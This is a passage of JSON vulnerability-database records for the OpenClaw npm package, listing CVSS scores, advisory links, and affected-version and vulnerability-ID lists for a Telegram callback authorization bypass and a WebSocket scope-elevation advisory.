},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","sco
ring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35661","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35661"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass"},{"reference_url":"https://github.com/advisories/GHSA-j4c9-w69r-cw33","reference_id":"GHSA-j4c9-w69r-cw33","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j4c9-w69r-cw33"}],"fixed_packages":[{"url":"http://public2.vulnerab
lecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-s
pue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a
3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-r
n42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35661","GHSA-j4c9-w69r-cw33"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tk9h-nqrz-uugp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91491?format=json","vulnerability_id":"VCID-tkxh-m458-6ydw","summary":"Duplicate Advisory: OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqpp-rjj8-7wv8. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to 2026.3.12 contain an authorization bypass vulnerability in the WebSocket connect path that allows shared-token or password-authenticated connections to self-declare elevated scopes without server-side binding. 
Attackers can exploit this logic flaw to present unauthorized scopes such as operator.admin and perform admin-only gateway operations.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22172","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22172"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-scope-elevation-in-websocket-shared-auth-connections","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"
url":"https://www.vulncheck.com/advisories/openclaw-scope-elevation-in-websocket-shared-auth-connections"},{"reference_url":"https://github.com/advisories/GHSA-x49q-fhhm-r9jf","reference_id":"GHSA-x49q-fhhm-r9jf","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x49q-fhhm-r9jf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"
vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"
vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"
vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"
vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"
vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vq